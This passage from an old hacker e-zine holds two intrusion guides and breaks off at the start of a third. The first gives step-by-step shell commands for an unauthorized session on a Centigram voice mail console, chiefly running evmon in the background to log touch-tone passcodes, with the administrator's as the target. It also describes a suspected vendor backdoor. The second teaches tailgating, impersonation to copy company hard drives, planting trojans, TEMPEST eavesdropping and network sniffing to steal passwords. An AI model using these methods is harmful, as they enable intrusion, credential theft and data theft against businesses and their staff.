Initial STTY Setting: I've had problems with my terminal settings not being set properly during the above entry procedure. I can correct this by using the "stty +echo +edit" command, and, for my terminal, all is restored. The correct values for STTY options and keys appear to be: Options: +echo +edit +etab +ers +edel +oflow +mapcr +hangup break=03h esc=1Ah rub=7Fh can=18h eot=04h up=15h down= 0Ah left=08h ins=0Eh del=0Bh The keymap, of course, can be modified as desired, but the options, especially +edit, appear to be necessary. [A somewhat detailed description of the options could follow, or maybe just a list and a brief review of the ones I care to comment on] Disks and directories: The drives and directories are set up in a remotely MessDos fashion. The output of a 'pwd' command looks similar to '4:/'. '4;' represents the drive number, and '/' is the start of the directory structure, '4:/' being the root directory for drive 4, '3:/tmp' being the /tmp directory on drive 3, etc. The two most important directories are 1:/cmds and 4:/cmds, which contain, for the most part, the program files for all of the performable commands on the system, excluding the commands written into the shell. The directory 1:/cmds should look similar to: $ ls backup drel ls rm talk chattr eo mkdir rmdir tcap choose fdformat mount runfloppy timer clrhouse files p search tsk cp frel pack sh unpack date get_boolean patch slay ws ddump led pwd sleep zap diff led.init qnxsh spatch dinit login query stty This is a display of many useful commands. chattr changes the read/write file attributes, cp is copy, ddump dumps disk sectors in hex & ascii, led is the line editor, p is the file print utility, and a variety of other things that you can experiment with at your own leisure. DO NOT USE THE TALK COMMAND. At least, be careful if you do. If you try to communicate with your own terminal, it locks communication with the shell, and upon hangup, for some reason, causes (well, in one instance) a major system error and system-wide reboot, which, quite frankly, made me say 'Oops. I'm not doing that again' when I called to check on the actual voice mailboxes, and the phone line just sat there, dead as old wood; and I was quite relieved that it came back up after a few minutes. The other directory, 4:/cmds, is filled with more specific commands pertaining to functions within the voice mail system itself. These programs are actually run from within other programs, to produce an easy-to-understand menu system. Normally, this menu system is immediately run after the entry of the remote or console passcode, but it would not be run when using the aforementioned security bug. It can be run from the shell simply by typing the name of the program, 'console'. Mounting and Initializing Drives: The MOUNT command produces results similar to this when run without arguments: $ mount Drive 1: Hard, 360k, offset = 256k, partition= Qnx Drive 2: Floppy, 360k, p=1Drive 3: RamDisk, 96k, partition= Qnx Drive 4: Hard, 6.1M, offset = 616k, partition= Qnx $tty0 = $con, Serial at 03F8 $tty1 = $term1 , Serial at 02F8 $tty2 = $term2 , Serial at 0420 $tty3 = $mdm , Serial at 0428 The Hard and Floppy drives are fairly self-explanatory, although I can't explain why they appear to be so small, nor do I know where the voice recordings go, or if this list contain all the space required for voice storage. The Ramdisk, however, is a bit more interesting to me. The mount command used for the above-mentioned disk 3 was: $ mount ramdisk 3 s=96k -v Although I'm not sure what the -v qualifier does, the rest is fairly straightforward. I assume that the size of the drive can be greater than 96k, although I haven't yet played with it to see how far it can go. To initialize the drive, the following command was used: $ dinit 3 Quite simple, really. Now the drive is ready for use, so one can 'mkdir 3:/tmp' or such and route files there as desired, or use it for whatever purpose. If something is accidentally redirected to the console with >$cons, you can use the line editor 'led' to create a temporary file and then use the print utility 'p' to clear the console's screen by using "p filename >$cons", where filename contains a clear screen of 25 lines, or an ANSI bomb (if appropriate), or a full-screen DobbsHead or whatever you like. EVMON and password collecting: The evmon utility is responsible for informing the system manager about the activity currently taking place within the voice mail system. Run alone, evmon produces output similar to: $ evmon Type Ctrl-C to terminate. ln 26 tt 3 ln 26 line break ln 26 onhook ln 28 ringing ln 28 tt 8 ln 28 tt 7 ln 28 tt 6 ln 28 tt 2 ln 28 offhook ln 28 tt * ln 28 tt 2 ln 28 tt 0 ln 28 tt 3 ln 28 tt 0 ln 28 line break ln 28 onhook [...] And so forth. This identifies a certain phone line, such as line 28, and a certain action taking place on the line, such as the line ringing, going on or offhook, etc. The 'tt' stands (I assume) for touch tone, and it is, of course, the tone currently played on the line; which means that touchtone entry of passcodes can be recorded and filed at will. In the above example, the passcode for Mailbox 8762 is 2030 (the * key, along with the 0 key, can acts as the 'user entering mailbox' key; it can, however, also be the abort key during passcode entry, and other things as well). Now the user, of course, doesn't (usually) dial 8762 to enter his mailbox, he simply dials the mailbox number and then * plus his passcode; the reason for this is the type of signalling coming from the switch to this particular business line was set-up for four digit touch tone ID to route the line to the appropriate called number. This is not the only method of signalling, however, as I've seen other businesses that use three digit pulse signalling, for example, and there are others as well. Each may have it's own eccentricities, but I would imagine that the line ID would be displayed with EVMON in most cases. Now, let's say we're online, and we want to play around, and we want to collect passcodes. We've set up our Ramdisk to normal size and we are ready to run evmon. We could run it, sit at our terminal, and then record the output, but it's such a time consuming task (this is 'real-time', after all) that sitting and waiting be nearly pointless. So, we use the handy features of run-in-background and file-redirection. (See, I told you we were getting 'Unix-like'.) $ evmon > 3:/tmp/output & Type Ctrl-C to terminate. 5e1e $ ... 5e1e is the task ID (TID) of the new evmon process. Now we can go off and perform whatever lists we want, or just play in the directories, or route DobbsHeads or whatever. When we decide to end for the day, we simply stop EVMON, nab the file, remove it, and if necessary, dismount the ramdisk. $ kill 5e1e $ p 3:/tmp/output [ EVMON output would normally appear; if, however, ] [ there is none, the file would be deleted during ] [ the kill with an error message resulting ] $ rm 3:/tmp/output $ rmdir 3:/tmp $ mount ramdisk 3 and now we can ^D or exit out of the shell and say good-bye. The good thing about this EVMON procedure is that you don't need to be online while it runs. You could start a task sometime at night and then wait until the next day before you kill the process and check your results. This usually produces large log files anywhere from 40K to 200K, depending upon the amount of system usage (these figures are rough estimates). If, however, you start the EVMON task and leave it running, then the administrator will not be able to start a new EVMON session until the old task is killed. While this probably shouldn't be a problem over the weekends, during business hours it may become a little risky. Remember though, that the risk might be worth it, especially if the administrator decides to check his mailbox; you'd then have his passcode, and possibly, remote telephone access to system administrator functions via touch-tone on the mailbox system. Task management: As we have just noted, any task like EVMON can be run in the background by appending the command line with a &, the standard unix 'run-in-background' character. A Task ID will echo back in hexadecimal, quite comparable to the unix Process ID. The program responsible for task management is called 'tsk' and should be in 1:/cmds/tsk. Output from running tsk alone should look something like: $ tsk Tty Program Tid State Blk Pri Flags Grp Mem Dad Bro Son 0 task 0001 READY ---- 1 ---IPLA----- 255 255 ---- ---- ---- 0 fsys 0002 RECV 0000 3 ---IPLA----- 255 255 ---- ---- ---- 0 dev 0003 RECV 0000 2 ---IPLA----- 255 255 ---- ---- ---- 0 idle 0004 READY ---- 15 ----PLA----- 255 255 ---- ---- 0508 0 /cmds/timer 0607 RECV 0000 2 -S--P-AC---- 255 255 ---- ---- ---- 0 /cmds/err_log 0509 RECV 0000 5 -S--P--C---- 255 255 0A0A ---- ---- 0 /cmds/ovrseer 0A0A REPLY 0607 5 -S--P--C---- 255 255 ---- ---- 030C 0 /cmds/recorder 010B REPLY 0509 5 -S--P--C---- 255 255 0A0A 0509 ---- 0 /cmds/master 030C REPLY 0607 5 -S--P--C---- 255 255 0A0A 010B 011C [ ... a wide assortment of programs ... ] 0 /cmds/vmemo 011C REPLY 0110 13 -S-----C---- 255 255 030C 011B ---- 3 /cmds/comm 0508 RECV 5622 8 ----P-A----- 255 255 0004 ---- 5622 3 /cmds/tsk 051D REPLY 0001 8 ------------ 255 255 301E ---- ---- 3 /cmds/qnxsh 301E REPLY 0001 14 ---------E-- 255 255 5622 ---- 051D 3 /cmds/login 5622 REPLY 0003 8 -------C---- 255 255 0508 ---- 301E Although I'm not quite sure at some of the specifics displayed in this output, the important parts are obvious. The first column is the tty number which corresponds to the $tty list in 'mount' (meaning that the modem I've just called is $tty3, and I am simultaneously running four tasks from that line); the second column is the program name (without the drive specification); the third column is the task ID; the middle columns are unknown to me; and the last three represent the ties and relations to other tasks (Parent task ID, another task ID created from the same parent, and task ID of any program called). Knowing this, it's easy to follow the tasks we've created since login. Initially, task 0508, /cmds/comm, was run, which presumably contains the requisite 'what should I do know that my user has pressed a key?' functions, which called /cmds/login to log the user in. Login was interrupted with ^Z and one of the shells, qnxsh, was called to handle input from the user. Finally, the typing of 'tsk' requires that the /cmds/tsk program be given a task ID, and the output of the program is simply confirming that it exists. As mentioned, to kill a task from the shell, simply type 'kill [task-id]' where [task-id] is the four digit hexadecimal number. There are other functions of the tsk program, as well. The help screen lists: $ tsk ? use: tsk [f={cmoprst}] [p=program] [t=tty] [u=userid] tsk code [p=program] tsk info tsk mem t=tid tsk names tsk size [p=program] [t=tty] [u=userid] tsk ports tsk tsk tsk tree [+tid] [+all] [-net] tsk users [p=program] [t=tty] [u=userid] tsk vcs tsk who tid ... options: +qnx -header +physical [n=]node s=sort_field I haven't seen all the information available from this, yet, as the plain 'tsk' tells me everything I need to know; however, you may want to play around, there's no telling what secrets are hidden... $ tsk tsk Tsk tsk? Have I been a bad computer? See what I mean? ddump: The ddump utility is used to display the contents on a specified blocks of the disk. It's quite simple to use. $ ddump ? use: ddump drive block_number [-v] Again, I'm not quite sure what the -v switch does, but the instructions are very straightforward. Normal output looks similar to: $ ddump 3 3 Place diskette in drive 3 and hit <-- this message is always displayed by ddump. Block 00000003 Status: 00 000: 00 00 00 00 00 00 00 00 94 00 00 00 00 00 00 00 ................ 010: 01 00 01 00 40 02 00 00 00 02 00 00 00 00 00 00 ....@........... 020: 00 01 00 FF FF 00 00 97 37 29 17 00 01 01 01 30 ........7).....0 030: C4 17 8E 62 69 74 6D 61 70 00 00 00 00 00 00 00 ...bitmap....... 040: 00 00 00 00 C0 00 00 00 00 00 00 00 00 00 00 00 ................ 050: 00 00 00 FF FF 00 00 A5 37 29 17 00 01 01 17 30 ........7).....0 060: C4 25 8E 6C 6C 6C 00 00 00 00 00 00 00 00 00 00 .%.lll.......... 070: 00 00 00 00 50 0E 00 00 00 0E 00 00 00 00 00 00 ....P........... 080: 00 01 00 FF FF 7E 05 A8 38 29 17 00 01 01 17 30 .....~..8).....0 090: C4 28 8F 61 62 63 00 00 00 00 00 00 00 00 00 00 .(.abc.......... 0A0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 0B0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ [...etc...] As you can probably notice, what we have here is the directory track for the ramdisk. It lists three files, even though the file abc no longer exists. The actual bytes have yet to be decoded, but, as far as the ramdisk goes, I suspect that they'll be memory related, and not physical block related; that is, I suspect that some of the numbers given above correspond to the memory address of the file, and not to the actual disk-block. So, at least for the ramdisk, finding specific files may be difficult. However, if you only have one file one the ramdisk besides 'bitmap' (which appears to be mandatory across all the disks), then the next file you create should reside on track 4 and continue working it's way up. Therefore, if you have evmon running and redirected to a file on the ramdisk, in order to check the contents, it's not necessary to kill the process, and restart evmon, etc. Simply 'ddump 3 4', and you could get either useless information (all the bytes are 00 or FF), or you could get something like: $ ddump 3 4 Place diskette in drive 3 and hit Block 00000004 Status: 00 000: 00 00 00 00 00 00 00 00 00 00 00 00 09 00 00 00 ................ 010: 6C 6E 20 20 32 36 20 74 74 20 33 1E 6C 6E 20 20 ln 26 tt 3.ln 020: 32 36 20 6C 69 6E 65 20 62 72 65 61 6B 1E 6C 6E 26 line break.ln 030: 20 20 32 36 20 6F 6E 68 6F 6F 6B 1E 6C 6E 20 20 26 onhook.ln 040: 32 38 20 72 69 6E 67 69 6E 67 1E 6C 6E 20 20 32 28 ringing.ln 2 050: 38 20 74 74 20 38 1E 6C 6E 20 20 32 38 20 74 74 8 tt 8.ln 28 tt 060: 20 37 1E 6C 6E 20 20 32 38 20 74 74 20 36 1E 6C 7.ln 28 tt 6.l 070: 6E 20 20 32 38 20 74 74 20 32 1E 6C 6E 20 20 32 n 28 tt 2.ln 2 080: 38 20 6F 66 66 68 6F 6F 6B 1E 6C 6E 20 20 32 38 8 offhook.ln 28 090: 20 74 74 20 2A 1E 6C 6E 20 20 32 38 20 74 74 20 tt *.ln 28 tt ... and so forth, thus making sure that the file does have some content. Depending upon the length of that content, you could then choose to either keep the file running, or restart evmon and buffer the previous output. led: The program 'led' is Centigram's answer to a standard text editor. It is equivalent to 'ed' in unix or 'edlin' in MSDOS, but it does have it's minor differences. led is used to create text files, edit, existing log files, or edit executable shell scripts. By typing 'led [filename]', you will enter the led editor, and if a filename is specified, and it exists, the file will be loaded and the editor set to line 1. If there is no filename on the command line, or the file does not exist, of the file is busy, then led begins editing a null file, an empty buffer, without the corresponding filename. (Commands can also be specified to be used in led after the filename is entered. If needed, you can experiment with this.) Notable commands from within led: i insert a append w [filename] write to disk; if no file is named, attempt to write to current file; if there is no current file, do not write. d delete current line a number goto line numbered q quit (if not saved, inform user to use 'qq') qq Really quit When inserting or appending, led will prompt you with a '.' period. To end you entry, simply enter one period alone on a line, and you will then return to command mode. When displaying the current entry, led will prefix all new, updated lines, with the 'i' character. The key sequence to enter a Dobbshead into a file and redirect it to the console, then, would be: $ led 3:/dobbshead3:/dobbshead : unable to match file i ___ . / \ . | o o | . | Y | U===== | \___/ FUCK YOU! q ?4 buffer has been modified, use qq to quit without saving w 3:/dobbshead 7 [the number of lines in the file] q $ p 3:/dobbshead > $cons $ rm 3:/dobbshead Ok, so it's not quite the Dobbshead. Fuck you. The console utility: The program that acts as the menu driver for the Voice Mail System Administration, the program that is normally run upon correct passcode entry, is /cmds/console. This program will simply produce a menu with a variety of sub-menu's that allow the administrator to perform a wide assortment of tasks. Since this is mostly self-explanatory, I'll let you find out about these functions for youself; I will, however, add just a few comments about the console utility. The first menu received should look like this: (c) All Software Copyright 1983, 1989 Centigram Corporation All Rights Reserved. MAIN MENU (R) Mailbox maintenance (R) Report generation (S) System maintenance (X) Exit Enter letter in () to execute command. When you need help later, type ?. COMMAND (M/R/S/X): The mailbox maintenance option is used when you want to find specific information concerning mailboxes on the system. For instance, to get a listing of all the mailboxes currently being used on the system: COMMAND (M/R/S/X): m MAILBOX MAINTENANCE (B) Mailbox block inquiry (C) Create new mailboxes (D) Delete mailboxes (E) Mailbox dump (I) Inquire about mailboxes (L) List maintenance (M) Modify mailboxes (P) Set passcode/tutorial (R) Rotational mailboxes (S) Search for mailboxes (X) Exit If you need help later, type ?. COMMAND (B/C/D/E/I/L/M/P/R/S/X): i Report destination (c/s1/s2) [c]: Mailbox to display: 0000-9999 >>> BOBTEL <<< Mailbox Data Inquiry Tue Mar 31, 1992 3:07 am Box Msgs Unp Urg Rec Mins FCOS LCOS GCOS NCOS MWI Passwd 8001 1 1 0 0 0.0 5 5 1 1 None Y 8002 0 0 0 0 0.0 5 5 1 1 None Y (t) 8003 0 0 0 0 0.0 12 12 1 1 None 0 0 0.0 12 12 1 1 None Y 8006 6 6 0 0 0.7 12 12 1 1 None N 8008 0 0 0 0 0.0 5 5 1 1 None Y 8013 0 0 0 0 0.0 12 12 1 1 None 1234 8014 0 0 0 0 0.0 5 5 1 1 None Y 8016 0 0 0 0 0.0 12 12 1 1 None Y [ ... etc ... ] This simply lists every box along with the relevant information concerning are the Total number of messages, number of unplayed messages, number of urgent messages, and number of received messages currently being stored on the drive for the mailbox; Mins is the numbers of minutes currently being used by those messages; F, L, G, and NCOS are various classes of service for the mailboxes; MWI is the message waiting indicator, or service light; and Passwd is simply a Yes/No condition informing the administrator whether the mailbox currently has a password. The'(t)' the password field means the box is currently in tutorial mode, and the '1234' that replaces the Y/N condition, I assume, means the box is set to initial tutorial mode with simple passcode 1234 -- in other words the box is available to be used by a new subscriber. Mailboxes with FCOS of 1 should be looked for, these represent administration or service mailboxes, although they are not necessarily capable of performing system administration functions. The System maintenance option from the main menu is very useful in that, if you don't have access to the qnxsh, you can still run a number of tasks or print out any file you wish from within the menu system. The System Mainenance menu looks like: SYSTEM MAINTENANCE (A) Automatic Wakeup (B) Automated Receptionist Extensions (D) Display modem passcode (E) Enable modem/serial port (F) Floppy backup (G) Resynchronize HIS PMS room status (H) Hard Disk Utilities (L) Lights test (M) Manual message purge (N) System name (P) Passcode (R) Reconfiguration (S) System shutdown (T) Time and date (U) Utility menu (V) Call Detail Recorder (W) Network menu (X) Exit Enter letter in () to execute command. When you need help later, type ?. COMMAND (A/B/D/E/F/G/H/L/M/N/P/R/S/T/U/V/W/X): If you don't have access to the 'p' command, you can still display any specific file on the drive that you wish to see. Choose 'v', the Call Detail Recorder option, from above, and you will get this menu: COMMAND (A/B/D/E/F/G/H/L/M/N/P/R/S/T/U/V/W/X): v Warning: cdr is not running. CALL DETAIL RECORDER MENU (C) Configure CDR (R) Run CDR (T) Terminate CDR (E) Run EVMON (F) Terminate EVMON (S) Show CDR log file (D) Delete CDR log file (X) Exit If you need help later, type ?. COMMAND (C/R/T/E/F/S/D/X): From here, you can use (C) Configure CDR to set the log file to any name that you want, and use (S) to print that file to your terminal. COMMAND (C/R/T/E/F/S/D/X): c Answer the following question to configure call detail recorder [ simply hit return until the last 'filename' question come up ] VoiceMemo line numbers enabled: HOST 1 lines: 0 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 VoiceMemo line numbers: EVMON: HOST 1 lines to monitor: 0 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 EVMON:VoiceMemo line numbers: Message levels are: 1: Detailed VoiceMemo 2: VoiceMemo 3: Pager 4: Receptionist 5: EVMON 6: Automatic WakeUp 7: Open Account Administrator 8: DTMF to PBX 9: Message Waiting Lamp 10: SL-1 integration 11: Centrex Integration Message levels enabled: 2 3 7 9 Message levels: cdr enable = [N] Enter filename to save log data = [/logfile] /config/remote.cmds Returning from the CDR configuration. CALL DETAIL RECORDER MENU (C) Configure CDR (R) Run CDR (T) Terminate CDR (E) Run EVMON (F) Terminate EVMON (S) Show CDR log file (D) Delete CDR log file (X) Exit If you need help later, type ?. COMMAND (C/R/T/E/F/S/D/X): s ad cd copy date dskchk evmon files ls mount p pwd query task tcap what Don't forget to return the filename back to it's original name, as shown in the [] field, after you have finished. If you don't have access to the shell, you can also run EVMON, from the CDR menu, using option E. It will simply start the evmon process displaying to your terminal, interruptable by the break character, ^C. This, unfortunately, cannot be redirected or run in the background as tasks running from the shell can. If, however, you have some time to kill you may want to play with it. Also from the System Maintenance menu, you can perform a number of shell tasks without direct access to the shell. Option (U), Utilities Menu, has an option called Task. This will allow you limited shell access, possibly with redirection and '&' back- grounding. COMMAND (A/B/D/E/F/G/H/L/M/N/P/R/S/T/U/V/W/X): U UTILITY MENU (B) Reboot (H) History (T) Task (X) Exit Enter letter in () to execute command. When you need help later, type ?. COMMAND (B/H/T/X): t Choose the following commands: ad cd copy date dskchk evmon files ls mount p pwd query task tcap what Enter a command name or 'X' to exit: pwd 1:/ Choose the following commands: ad cd copy date dskchk evmon files ls mount p pwd query task tcap what Enter a command name or 'X' to exit: evmon Type Ctrl-C to terminate. ln 29 ringing ln 29 tt 8 ln 29 tt 0 ln 29 tt 8 ln 29 tt 6 ln 29 offhook ln 29 record ended [ ... etc ... ] A look at 'ad': The program 'ad' is called to dump information on a variety of things, the most useful being mailboxes. Dumps of specific information about a mailbox can be done either in Mailbox format, or Raw Dump format. Mailbox format looks like: $ ad Type #: 0 Mailbox #: 8486 (M)ailbox, (D)ump ? m MAILBOX: 8486 Login status: Bad logs = 3 Last log = 03/26/92 12:19 pmVersion = 0 Configuration: Name # = 207314 Greeting = 207309 Greeting2 = 0 Passcode = XXXXXXXXXX Tutorial = N Extension = 8486 Ext index = 0 Attendant = Attend index = 0 Code = ID = BOBTECHM Night_treat = M Fcos = 12 Lcos = 12 Gcos = 1 Ncos = 1 Rot index = 0 Rot period = 0 Rot start = -- wkup defined = N wkup freq = 0 wkup_intvl = 0 wkup index = 0 wkup number =Contents: Motd_seq = 8 Motd_played = N User_msgs = 0 Caller_msgs = 4 Sent_cpx_msgs= 0 Sent_ fdx_msgs= 0 Sent_urg_msgs= 0 Tas_msgs = 0 Pages = 0 Receipt = 0 Sent_to_node = 0 Urg_to_node = 0 Net_urg_mlen = 0 Net_msgs_rcv = 0 Net_urg_rcv = 0 Net_sent_node= 0 Net_send_nurg= 0 Net_send_rcp = 0 Greet_count = 9 Successlogins= 1 Recpt_calls = 0 Recpt_complt = 0 Recpt_busy = 0 Recpt_rna = 0 Recpt_msgs = 0 Recpt_attend = 0 User_connect = 20 Clr_connect = 22 Callp_connect= 0 Disk_use = 498 Net_sent_mlen= 0 Net_rcvd_mlen= 0 Net_rcvd_urg = 0 Net_node_mlen= 0 Net_recip_mlen=0 Net_node_urg = 0 Text_msg_cnt = 0 Message Queues: TYPE COUNT TOTAL HEAD TAIL TYPE COUNT TOTAL HEAD TAIL Free 71 --- 58 55 Unplayed 0 --- -1 -1 Played 2 0.5 56 57 Urgent 0 --- -1 -1 Receipts 0 --- -1 -1 Undelivered 0 --- -1 -1 Future delivery 0 --- -1 -1 Call placement 0 --- -1 -1 Messages: 2 # msg # DATE TIME LENGTH SENDER PORT FLAGS MSG SIBL (MINS) NXT PRV NXT PRV Played Queue 56 207126 03/26/92 12:17 pm 0.5 000000000000000 27 ------P- 57 -1 -1 -1 57 207147 03/26/92 12:19 pm 0.1 000000000000000 29 ------P- -1 56 -1 -1 The Ramp format looks like: $ ad Type #: 0 Mailbox #: 8487 (M)ailbox, (D)ump ? d HEX: 8487 000: 00 00 00 00 00 00 00 00 - 00 00 00 00 00 00 00 00 |................| 010: 00 00 00 00 00 00 00 00 - 00 00 00 00 00 00 00 00 |................| 020: 00 00 00 00 00 00 00 00 - 00 00 00 00 00 00 34 38 |..............48| 030: 37 00 00 00 00 00 00 00 - 00 00 00 00 00 00 00 00 |7...............| 040: 00 00 00 00 00 00 00 00 - 00 00 00 00 00 00 00 00 |................| 050: 00 00 00 00 00 00 00 00 - 00 00 42 49 4f 54 45 43 |..........BOBTEC| 060: 48 00 00 00 00 00 00 00 - 00 00 00 00 00 00 00 00 |H...............| 070: 00 00 00 00 00 00 00 00 - 00 00 00 00 00 00 00 00 |................| 080: 00 00 00 00 00 00 00 00 - 00 00 00 00 00 37 32 33 |.............723| 090: 36 00 00 00 00 00 00 00 - 00 00 00 00 00 00 00 00 |6...............| 0a0: 00 00 00 00 00 00 00 00 - 00 00 00 00 00 00 00 00 |................| 0b0: 00 00 00 00 00 00 00 00 - 00 00 00 00 00 00 00 00 |................| 0c0: 00 00 00 00 00 00 00 00 - 00 00 00 00 00 00 00 00 |................| [mostly deleted -- the list continues to hex fff.] One of the unfortunate aspects is that the password is not displayed in the Mailbox format (Awwww!). I can tell you now, though, that it also isn't displayed anywhere in the Raw Dump format. The program 'asetpass' was used to change the password of a test mailbox, and both full dumps were downloaded and compared; they matched exactly. So, it looks like the passcodes are probably stored somewhere else, and the dump simply contains a link to the appropriate offset; which meansthe only way, so far, to get passcodes for mailboxes is to capture them in EVMON. Intricacies of the login program: The console login program is 1:/cmds/login. Although I can't even recognize any valid 8080 series assembly in the program (and I'm told the Centigram boxes run on the 8080 family), I did manage to find a few interesting tidbits inside of it. Firstly, the console and remote passwords seems to be stored in the file /config/rates; unfortunately, it's encrypted and I'm not going to try to break the scheme. /config/rates looks like this: $ p /config/rates \CE\FFC~C~\0A\00\00\00\00\00\0A\00\00\00\00\00\0A\00\00\00\00\00\0A\00\00\00\00 \00\0A\00\00\00\00\00\0A\00\00\00\00\00\0A\00\00\00\00\00\00\00\00\00\00\00\00 \00\00\00\00\00\00\00\00\00\00\00\00\00\00\00\00\00\00\00\00\00\00\00\00\00\00 Accepting the \CE as some sort of control byte, this file is divided up into about eight empty sections of five bytes a piece, mostly null, indicating that, possibly, there are a number of acceptable passcode combinations, or a number of different functions with different passcodes. In this instance, only one passcode appears to be selected. I am still unsure, however, whether this is actually a password file, or a file that would acts as a pointer to another space on the disk which contains the actual password. I would assume, for this login program, that it is actually an encrypted password. Another very interesting thing sleeping within the confines of the login program is the inconspicuous string 'QNX'. It sits in the code between two 'Enter Passcode:' prompts, separated by \00's. I believe this to be a system-wide backdoor placed into the login program by Centigram, Corp. Such a thing does exist; whenever Centigram wants to get into a certain mailbox system to perform maintenance or solve a problem, they can. They may, however, require the Serial number of the machine or of the Hard Drive, in order to get this access. (This serial number would be provided by the company requiring service.) When logging in with QNX, a very strange thing happens. (^Z) Enter Passcode: (QNX^M) Enter Passcode: A second passcode prompt appears, a prompt in which the 'QNX' passcode produces an Invalid Passcode message. I believe that when Centigram logs in from remote, they use this procedure, along with either a predetermined passcode, or a passcode determined based on a serial number, to access the system. I have not ever seen this procedure actually done, but it is the best speculation that I can give. I should also make note of a somewhat less important point. Should the console have no passcodes assigned, a simple ^Z for terminal activation will start the /cmds/console program, and log the user directly in without prompting for a passcode. The odds on finding a Centigram like this, nowadays, is probably as remote as being struck by lightning, but personally, I can recall a time a number of years back when a Florida company hadn't yet passcode protected a Centigram. It was very fun to have such a large number of people communicating back and forth in normal voice; it was even more fun to hop on conferences with a number of people and record the stupidity of the average Bell operator. Special Keys or Strings: There are a number of special characters or strings that are important to either the shell or the program being executed. Some of these are: ? after the program name, gives help list for that program. & runs a task in the background : sets the comment field (for text within shell scripts) ; command delimiter within the shell > redirects output of a task to a file < (theoretically) routes input from a file $cons the 'filename' of the console (redirectable) $tty# the 'filename' of tty number '#' $mdm the 'filename' of the modem line #$ ? produces a value like '1920', '321d' probably the TID of the current process ## ? produces a value like 'ffff' #% ? produces a value like '0020', '001d' #& ? produces a value like '0000' #? ? produces a value like '0000' #* a null argument #g ? produces a value like '00ff' #i directly followed by a number, produces '0000' not followed, produces the error 'non-existent integer variable' probably used in conjunction with environment variables #k accepts a line from current input (stdin) to be substituted on the command line #m ? '00ff' #n ? '0000' #p ? '0042' #s produces the error 'non-existent string variable' probably used in conjunction with environment variables #t ? '0003' #u ? some string similar to 'system' #D ? '0018' #M ? '0004' #Y ? '005c' "Notes on Centigram Voice Mail system Consoles" was written anonymously. There are no group affiliations tied to this file. =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= NIA074 / File 05 How to steal Information The Butler... Now that we have entered the "Information Age" we must realize that information is an asset worth protecting. The problem is that what some people consider trash others view as gold. That is why on any given day you can find mounds of valuable information in most companies trashcans, employees desks, and on floppy disks lying around the office. This article will focus on the different ways of gaining access to that information which is most often left unprotected. To begin with I will discuss the most vulnerable aspect of any security plan, people. Individuals are the weakest link in any security system whether it be a guard check point or a CN/A operator, the reason this is so is because when ever a human is brought into the picture to determine whether or not to give access or information to another human more often than not a judgement call has to be made. As human beings we have feelings like sorrow and pity to deal with, and those feelings can and are exploited. Now lets say you wanted to gain access to a certain building that required some sort of Key-Card to open the door. With out having one yourself you could either 1) steal one, 2) make your own, or 3) walk in behind someone else who does have one. Number 3 is the one I want to expand on here. I have used this method myself, for legitimate purposes of course. By looking like you belong in said building and waiting by the door with a confused and sad look on your face you could say to someone "I left my Key-Card at home" and just walk in behind them. Now this probably wouldn't work at a small company but more likely at a large institution with several entrances, use the back door! When I said look like you belong I mean dress accordingly. i.e. to go to a high tech software company you should be wearing a suit with a briefcase in hand. Just in case why don't you case the establishment for a few days before your attempt and make note of what the majority of employees are wearing. Another scenario could be at a industrial firm that you were interested in. In this case we will try and play on another human feeling, greed. Chances are in this situation the individuals responsible for any and all computers are, well less than computer literate. You could send them a letter in the mail advertising a free cleaning and inspection of all personal computers on the premises. This is an excellent way of gathering information from heavily industrialized companies. Usually places where computers are practically on the factory floor will be more than happy to let you clean their machines. While doing so just copy to your hearts content, or if you are adventurous you could take a portable and connect it via a serial port or whatever and copy the entire hard drive. Just tell them you are running some diagnostics. The last scenario I will cover is another example of disguising yourself. I know this one works and it seems that people are doing it quite frequently. Just get a job with a janitorial firm and sneak away from the actual work to do your bidding. After gaining access to any company by whatever means you have to know where to look. To begin with go to the largest office you can find, usually in a corner with a good view. These prime offices usually belong to those in the upper echelon of the company. Once in the office you obviously should start with computers since you can copy electronic information easier than hardcopy. Next you should turn to the desk drawer and file cabinets in the office. Check the rolodex for dialup #'s and passwords. Basically don't leave any stone unturned. Depending on what you are looking for you might want to start out in the Data Processing department since their computers are the heart of the whole business. From there you can plant trojan horses, copy proprietary software, or steal specific data. Some other means of disguise: PC Repair Shop Technician Software Demonstrator All of the above items can be used for completely legal purposes also. The above have all been physical means of gathering information, now lets turn to other ways. Van Eck With the proper equipment it is possible to capture every electronic pulse that is sent out from a keyboard or a monitor while you are hidden far away from the actual activity. The U.S. Government calls this the Tempest project. If you are ever in a government office just take a look at their computers. I know that the armed services have all of their computers protected by heavy metal shielding around all computers, even pc's in army recruiting stations. Check the loompatics(sp) catalog for a book called Van- -Eck Phreaking, it explains the whole process and the equipment needed. This method would generally be used to steal usernames and passwords. Network Protocol Analyzers If you have access to a Local Area Network you might already have one of these puppies. A Network protocol analyzer is a device that lets you examine every packet that is sent out over a network. I am talking about Novell, Banyan and 3COM networks if you are wondering. By using one of these you can capture every byte that travels from any given workstation to the file server. This equipment is very expensive but could well be worth it depending on what you are after. This method could be used to steal everything from usernames and passwords to actual data. Keyboard & Monitor Capture program I have never done this but I think it could be possible to write a program (a trojan) that would capture everything that is entered from the keyboard and everything that goes across the monitor and save it in a hidden file somewhere on a network. Old Reliable--Social Engineering Now (with a known bug) we can social engineer electronically via E-mail. The Telnet bug which allows you to send a message to someone without them knowing the source can be very useful. Unlimited applications.....And there is always the telephone for the same purpose. Just make up a story and try it out. The obvious "Hello I am the Sysop please change your password to ____" is not what I am talking about. You need to be more creative like posing as a salesman or a surveyor to get information that will make your "Crack" easier. I hope this helps you with your quest for knowledge!!! The Butler... =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= NIA074 / File 07 Invisible Killer Chips Now 